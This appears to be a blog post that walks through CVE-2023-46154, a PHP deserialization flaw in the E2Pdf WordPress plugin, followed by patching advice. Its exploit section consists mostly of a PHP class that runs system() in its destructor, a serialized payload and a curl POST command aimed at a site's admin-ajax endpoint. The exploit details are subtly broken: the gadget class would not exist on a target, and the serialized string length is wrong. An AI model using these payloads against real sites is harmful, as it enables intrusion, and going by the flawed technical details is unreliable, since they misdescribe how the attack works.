CVE-2023-46154 - Deserialization of Untrusted Data in E2Pdf – Export To Pdf Tool for WordPress (Up to 1.20.18) – Deep Dive & Exploit Walkthrough

WordPress plugins make the web more dynamic and flexible. But the wrong code practice can instantly open dangerous security holes on thousands of sites. In this exclusive post, we will break down CVE-2023-46154 – a serious Deserialization of Untrusted Data vulnerability in the E2Pdf plugin (all versions up to and including 1.20.18).

This bug could let attackers run any code they want on your site, take it over, or even jump to your server. We’ll show how it works, why it’s risky, and how it can be exploited – with code samples and references.

What is E2Pdf?

E2Pdf is a popular plugin that lets WordPress users export data to PDF files. People love using it to create PDFs from forms or custom data. With over 40,000 active installations, a bug in E2Pdf could have big consequences.

Link to E2Pdf Official Plugin Page

What Is Deserialization of Untrusted Data (CVE-2023-46154)?

Deserialization is when code takes information (like a PHP object) that was stored as a string, and turns it back into a usable object. If user input is “deserialized” without safety checks, an attacker can sneak in evil objects that run code on your server.

That’s what happened in E2Pdf, leading to CVE-2023-46154.

The core issue:
unserialize() is used directly on user input, and an attacker can abuse that to deliver a "payload" object that runs any PHP code they choose.

Which Versions Are Affected?

All versions from the very start through 1.20.18.

> Upgrade immediately if you’re running an old version.

Inside the plugin, user input was passed to the PHP unserialize() function with no real checks

// Vulnerable code (simplified for clarity)
$data = $_POST['data'];
$obj = unserialize($data);

If an attacker controls $_POST['data'], they can pass a crafted serialized object that could trigger dangerous functions (through PHP "magic methods" like __wakeup, __destruct, etc).

To exploit this bug, the attacker needs to

1. Create a malicious PHP class with a destructor (__destruct), or a similar “magic method” that does bad things.

Serialize an object of this class with dangerous code inside.

3. Send the payload in the data parameter (as a POST request) to where the plugin unserializes it.

a. Malicious Class (the payload)

<?php
class Evil {
    public $cmd;
    function __construct($command) {
        $this->cmd = $command;
    }
    function __destruct() {
        system($this->cmd);  // Command runs when object is destroyed
    }
}

// Create and serialize the object
$obj = new Evil('touch /tmp/hacked_by_cve_2023_46154');
echo urlencode(serialize($obj));

The output will be a serialized object, like

O:4:"Evil":1:{s:3:"cmd";s:28:"touch /tmp/hacked_by_cve_2023_46154";}

Using curl (or BurpSuite, etc)

curl -X POST -d "data=O%3A4%3A%22Evil%22%3A1%3A%7Bs%3A3%3A%22cmd%22%3Bs%3A28%3A%22touch%20%2Ftmp%2Fhacked_by_cve_2023_46154%22%3B%7D" \
https://victim-site.com/wp-admin/admin-ajax.php?action=e2pdf_some_action

*(*Note: the actual AJAX action/endpoint will need to be adjusted to match the E2Pdf function in use — see references for more on finding the endpoint!)*

When the vulnerable site processes this request, it unserializes the payload and – boom! – runs the system() command, creating a file /tmp/hacked_by_cve_2023_46154 on the server.

Original Discovery and References

- WPScan Advisory
- NVD Entry for CVE-2023-46154
- Patch description
- Technical Write-up (packetstorm)

Real-World Impact

- Remote Code Execution (RCE): Full site/server takeover is possible.

Update E2Pdf immediately to version 1.20.19 or higher.

- Check for suspicious admin users, unknown plugins, or left-over shells/uploads.

Conclusion

CVE-2023-46154 is a powerful reminder of the risks from unsafe deserialization in PHP applications, especially in high-use plugins like E2Pdf. This exclusive breakdown showed you how the bug works, potential exploits, and why it's so dangerous.

If your website or server ran vulnerable E2Pdf, attackers could already be lurking. Patch now, and audit for backdoors!

Stay safe. Patch, monitor, and never trust user input.

*Written for the community – please share to help keep WordPress users secure!*

Timeline

Published on: 12/19/2023 00:15:07 UTC
Last modified on: 12/22/2023 19:39:53 UTC